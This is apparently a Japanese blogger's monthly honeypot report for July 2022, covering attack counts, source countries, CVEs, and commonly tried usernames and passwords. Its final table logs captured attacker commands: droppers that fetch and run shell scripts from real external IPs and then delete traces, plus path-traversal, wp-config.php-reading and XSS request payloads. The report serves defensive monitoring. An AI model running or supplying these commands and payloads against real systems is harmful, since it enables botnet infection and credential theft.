ハニーポット運用(月次報告:2022年7月)
今月のTopics
2022年7月2日にKDDI社の通信サービスにて大規模な通信障害が発生した。
通信障害の概要は以下と発表されている。
影響範囲
| 影響時間 | 影響エリア |
|---|---|
| 7月2日(土) 1:35~ 7月4日(月)15:00 (61時間25分) | 全国 |
影響数
| 音声(VoLTE) | 影響エリア |
|---|---|
| 約2,278万人 | 765万人以上 |
原因は経路誤設定による通信断から位置登録要求信号が大量に発生し、 全国のVoLTE交換機と加入者DBが輻輳状態になったためであるとのこと。 7月29日に発表された障害報告資料は、良く纏められており参考になる内容であった。 https://www.kddi.com/extlib/files/corporate/ir/library/presentation/2023/pdf/kddi_220729_shougai_qybBYn.pdf?_ga=2.238695624.979087128.1660797447-60409627.1660797447
携帯電話が大半を占める現代社会においては公衆電話は廃れていくように感じるが、大規模災害などで公衆電話が利用される実績も過去にはあるため、一定数は残してほしいと個人的には思う。 T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年7月5日-2021年7月31日
運用期間:26日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Ddospot | 2,158,135 | 987,974 |
| 2 | Cowrie | 1,029,579 | 44,063 |
| 3 | Honeytrap | 456,584 | -179,771 |
| 4 | Heralding | 454,482 | 167,482 |
| 5 | Dionaea | 253,563 | -138,588 |
| 6 | Mailoney | 49,693 | 22,309 |
| 7 | Adbhoney | 11,364 | 3,494 |
| 8 | Tanner | 6,514 | 2,488 |
| 9 | ConPot | 2,580 | 740 |
| 10 | Redishoneypot | 2,465 | 39 |
| 11 | CitrixHoneypot | 1,803 | 241 |
| 12 | Ciscoasa | 1,452 | -49 |
| 13 | ElasticPot | 1,125 | 432 |
| 14 | Ipphoney | 173 | 24 |
| 15 | Dicompot | 81 | 0 |
| 16 | Medpot | 0 | -120 |
- Result
- 特記事項無し
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Brazil | 1,238,688 | 1(→) |
| 2 | United States | 641,490 | 2(→) |
| 3 | Netherlands | 391,300 | 4(↑) |
| 4 | China | 278,490 | 3(↓) |
| 5 | Russia | 249,637 | 5(→) |
| 6 | Singapore | 135,287 | 12(↑) |
| 7 | Germany | 106,211 | 11(↑) |
| 8 | Japan | 99,295 | 6(↓) |
| 9 | India | 82,102 | 8(↓) |
| 10 | Vietnam | 80,482 | 9(↓) |
| 11 | United Kingdom | 70,906 | 10(↓) |
| 12 | South Korea | 63,652 | 13(↑) |
| 13 | Bangladesh | 59,277 | 14(↑) |
| 14 | France | 41,284 | 17(↑) |
| 15 | Indonesia | 39,845 | 15(→) |
| 16 | Hong Kong | 39,217 | 19(↑) |
| 17 | Taiwan | 38,788 | 圏外(↑) |
| 18 | Canada | 33,202 | 圏外(↑) |
| 19 | Sweden | 29,375 | 16(↓) |
| 20 | Latvia | 25,923 | 圏外(↑) |
- Result
- 先月に引き続きBrazil , United Statesからのアクセスが多かった。
- China , Russiaからのアクセスは小康状態にある。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 162,184 |
| 2 | CVE-2020-11910 | 3,393 |
| 3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 45 |
| 4 | CVE-1999-0016 | 1 |
- Result
- 特記事項無し
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 71,677 |
| 2 | sa | 10,501 |
| 3 | admin | 7,972 |
| 4 | nproc | 3,682 |
| 5 | user | 2,176 |
| 6 | (empty) | 1,352 |
| 7 | support | 1,222 |
| 8 | test | 1,189 |
| 9 | 22 | 884 |
| 10 | postgres | 847 |
| 11 | ubuntu | 847 |
| 12 | oracle | 524 |
| 13 | 2Wire | 449 |
| 14 | !root | 430 |
| 15 | git | 389 |
| 16 | ftpuser | 358 |
| 17 | guest | 319 |
| 18 | www | 295 |
| 19 | adm | 290 |
| 20 | user2 | 263 |
| 21 | mysql | 257 |
| 22 | 666666 | 239 |
| 23 | blank | 236 |
| 24 | 0 | 235 |
| 25 | debug | 235 |
| 26 | jenkins | 228 |
| 27 | unknown | 228 |
| 28 | administrator | 227 |
| 29 | $ALOC$ | 223 |
| 30 | ubnt | 222 |
| 31 | deploy | 221 |
| 32 | testuser | 215 |
| 33 | ftp | 214 |
| 34 | anonymous | 208 |
| 35 | minecraft | 204 |
| 36 | Admin | 190 |
| 37 | user1 | 190 |
| 38 | db | 183 |
| 39 | web | 177 |
| 40 | wwwroot | 172 |
| 41 | test1 | 152 |
| 42 | www-data | 141 |
| 43 | dev | 135 |
| 44 | server | 132 |
| 45 | tomcat | 132 |
| 46 | alex | 126 |
| 47 | nagios | 126 |
| 48 | hadoop | 124 |
| 49 | steam | 122 |
| 50 | ts3 | 122 |
- Result
- saユーザへのアクセスが若干増えている。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | 123456 | 4,519 |
| 2 | admin | 4,313 |
| 3 | nproc | 3,682 |
| 4 | (empty) | 2,975 |
| 5 | 123 | 1,722 |
| 6 | password | 1,529 |
| 7 | 1234 | 1,435 |
| 8 | 1 | 1,326 |
| 9 | 12345 | 1,119 |
| 10 | suport | 727 |
| 11 | blank | 677 |
| 12 | 12345678 | 667 |
| 13 | 0 | 491 |
| 14 | test | 396 |
| 15 | user | 376 |
| 16 | 123456789 | 342 |
| 17 | 666666 | 318 |
| 18 | 123123 | 311 |
| 19 | ubnt | 304 |
| 20 | support | 301 |
| 21 | root | 291 |
| 22 | master | 282 |
| 23 | 1234567 | 268 |
| 24 | alpine | 262 |
| 25 | P@ssw0rd | 260 |
| 26 | 00000000 | 258 |
| 27 | 111111 | 247 |
| 28 | qwerty | 247 |
| 29 | backup | 246 |
| 30 | 1qaz2wsx | 244 |
| 31 | hi3518 | 232 |
| 32 | unknown | 231 |
| 33 | synnet | 227 |
| 34 | 10023 | 222 |
| 35 | _Cisco | 219 |
| 36 | !ishtar | 212 |
| 37 | 1q2w3e4r | 206 |
| 38 | admin123 | 204 |
| 39 | Passw0rd | 195 |
| 40 | test123 | 192 |
| 41 | abc123 | 190 |
| 42 | passw0rd | 190 |
| 43 | bosco | 172 |
| 44 | Pa$$w0rd | 171 |
| 45 | p@ssw0rd | 165 |
| 46 | 123qwe | 164 |
| 47 | 1234567890 | 162 |
| 48 | 12 | 152 |
| 49 | P@ssword | 151 |
| 50 | pa55word | 147 |
- Result
- 特記事項無し
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- 7月はshファイルを利用したアクセスを複数確認した。
ohsitsvegawellrip.shについては8月1日時点でVirusTotalにおいて多くの対策ソフトでmalwareとは検知されていない。
◆shファイルに関するアクセス
| No | ファイル名 | hash値(md5) | アクセス |
|---|---|---|---|
| 1 | /sora.sh | 2655c5108f0fbe1b4988e473ea7cf975 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.188.118/sora.sh; curl -O http://193.233.188.118/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 193.233.188.118 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 193.233.188.118; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.233.188.118 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf * |
| 2 | /sora.sh | b4c8a40638801a1b5c6701ee8c4d96ff | CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.0.8.157/sora.sh; curl -O http://37.0.8.157/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 37.0.8.157 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 37.0.8.157; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.0.8.157 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf * |
| 3 | /sh | 078e9a9b315d76ae99d7449aa8182fee | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
| 4 | /dompdf.php | 61aeec46a50c9ea8268014d2e7f0c0ef | /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php |
| 5 | /dompdf.php | 61aeec46a50c9ea8268014d2e7f0c0ef | /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php |
| 6 | /catvsdog.sh | 33e442e5a30a40dbb0fe303e8d296ad5 | CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.187.87.141/catvsdog.sh; curl -O http://37.187.87.141/catvsdog.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp 37.187.87.141 -c get 0xt984767.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp -r catvsdog.sh -g 37.187.87.141; chmod 777 catvsdog.sh; sh catvsdog.sh; ftpget -v -u anonymous -p anonymous -P 21 37.187.87.141 catvsdog.sh catvsdog.sh; sh catvsdog.sh; rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh; |
| 7 | /z.sh | 0e2cc69b4f0c859bd59bc34f48a3d44d | CMD: cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://185.225.73.78/z.sh; curl -O http://185.225.73.78/z.sh; chmod 777 z.sh; sh z.sh; tftp 185.225.73.78 -c get tz.sh; chmod 777 tz.sh; sh tz.sh; tftp -r tz2.sh -g 185.225.73.78; chmod 777 tz2.sh; sh tz2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.225.73.78 z1.sh z1.sh; sh z1.sh; rm -rf z.sh tz.sh tz2.sh z1.sh; rm -rf * |
| 8 | /ssi/printenv.shtml | 27a505e858e000b7a478dfde26bf8378 | /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E |
| 9 | /nig.sh | 4bb1da6f7a9b5e3ddcac0c1d0c14a547 | CMD: rm -rf nig.sh; rm -rf miori.*; wget http://81.161.229.116/nig.sh || curl -O http://81.161.229.116/nig.sh || tftp 81.161.229.116 -c get nig.sh || tftp -g -r nig.sh 81.161.229.116; chmod 777 nig.sh;./nig.sh ssh; rm -rf nig.sh |
| 10 | /ok.sh | 34750f03237595d58567332a2346a23c | cd /tmp ; wget 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c |
| 11 | /8UsA2.sh | 42dd431252129ecc2eb88c52d06d5216 | CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.106.145/8UsA.sh; curl -O http://208.67.106.145/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 208.67.106.145 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 208.67.106.145; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 208.67.106.145 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *, |
| 12 | /brokeskid.sh | d54b92f364fafc14696e85f94a36c9f2 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://62.197.136.157/brokeskid.sh; chmod 777 ; sh brokeskid.sh; tftp -g 62.197.136.157 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c |
| 13 | /bin.sh | 0c5590a0fbde98b80e6865a543b64009 | CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://75.119.139.188/bin.sh; chmod 777 ; sh bin.sh; tftp -g 75.119.139.188 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c |
| 14 | /ohsitsvegawellrip.sh | 995ad2adfc03237543b2446317ba5f06 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.221.67.212/ohsitsvegawellrip.sh; curl -O http://37.221.67.212/ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; sh ohsitsvegawellrip.sh; tftp 37.221.67.212 -c get ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; sh ohsitsvegawellrip.sh; tftp -r ohsitsvegawellrip2.sh -g 37.221.67.212; chmod 777 ohsitsvegawellrip2.sh; sh ohsitsvegawellrip2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.221.67.212 ohsitsvegawellrip1.sh ohsitsvegawellrip1.sh; sh ohsitsvegawellrip1.sh; rm -rf ohsitsvegawellrip.sh ohsitsvegawellrip.sh ohsitsvegawellrip2.sh ohsitsvegawellrip1.sh; rm -rf * |
◆exeファイルに関するアクセス
| No | ファイル名 | hash値(md5) | アクセス |
|---|---|---|---|
| 1 | csrss.exe | - |
今月の作業BGM
| 曲名 | アーティスト | 備考 |
|---|---|---|
| Good Time | Owl City & Carly Rae Jepsen | --- |
